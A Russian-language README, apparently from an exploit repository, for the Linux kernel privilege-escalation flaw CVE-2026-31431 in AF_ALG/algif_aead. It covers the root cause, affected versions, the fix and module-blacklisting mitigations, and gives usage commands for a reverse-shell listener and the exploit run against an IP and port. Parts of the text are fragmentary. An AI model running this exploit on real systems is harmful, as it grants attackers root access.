
Эксплойт локального повышения привилегий для CVE-2026-31431 — логической ошибки в AF_ALG ядра Linux, позволяющей непривилегированным пользователям записать 4 байта в page cache и получить root. Включает PoC-скрипт и рекомендации по смягчению последствий.
Copy Fail — это уязвимость локального повышения привилегий (LPE) высокой степени серьёзности в криптографической подсистеме ядра Linux (algif_aead). Обнаруженная и раскрытая компанией Theori (с помощью их инструмента анализа уязвимостей на базе ИИ Xint Code) 29 апреля 2026 года, эта ошибка позволяет любому непривилегированному локальному пользователю записать 4 контролируемых байта в page cache любого читаемого файла — и использовать это для получения root практически на всех основных дистрибутивах Linux, выпущенных с 2017 года.
Рабочий proof-of-concept эксплойт занимает всего ~732 байта Python.
sudo ncat -lvnp PORT
# Использование Python-скрипта
python3 CVE-2026-31431-Exploit.py IP PORT
# Скомпилированный бинарник
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
AF_ALG и привяжитесь к authencesn(hmac(sha256),cbc(aes))По сути, каждый крупный дистрибутив Linux, выпущенный с 2017 года, затронут.
Обновите ядро до версии, содержащей исправляющий коммит fafe0fa2995a. Большинство крупных дистрибутивов выпустили или выпускают обновлённые пакеты ядра.
Если вы не можете применить патч немедленно:
algif_aead в чёрный список:
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
Этот репозиторий предназначен только для образовательных и защитных целей. Информация здесь призвана помочь командам безопасности понять, обнаружить и смягчить CVE-2026-31431. Всегда соблюдайте практики ответственного раскрытия и действующее законодательство.
| Поле | Детали |
|---|
| CVE ID | CVE-2026-31431 |
| Оценка CVSS | 7.8 (ВЫСОКАЯ) |
| Тип | Локальное повышение привилегий (LPE) |
| Компонент | algif_aead — пользовательский криптоинтерфейс AF_ALG ядра Linux |
| Корневая причина | Логическая ошибка в AEAD-шаблоне authencesn; оптимизация на месте (коммит 72548b093ee3, август 2017) приводит к тому, что страницы page cache попадают в записываемый scatterlist назначения ядра |
| Примитив | Контролируемая запись 4 байт в page cache любого читаемого файла |
| Механизм эксплойта | AF_ALG сокет → splice() → повреждение page cache setuid-бинарника → root |
| Гонка (race condition)? | ❌ Нет — прямолинейная логическая ошибка, 100% надёжность |
| Нужно ли смещение ядра? | ❌ Нет |
| Исправляющий коммит | fafe0fa2995a (откатывает оптимизацию 2017 года) |
| Затронуты | Не затронуты |
|---|
| Ядро Linux 4.14 — 7.0-rc | Ядра до 4.14 (до коммита августа 2017) |
| Все 6.18.x до 6.18.22 | 6.18.22+ (исправлено) |
| Все 6.19.x до 6.19.12 | 6.19.12+ (исправлено) |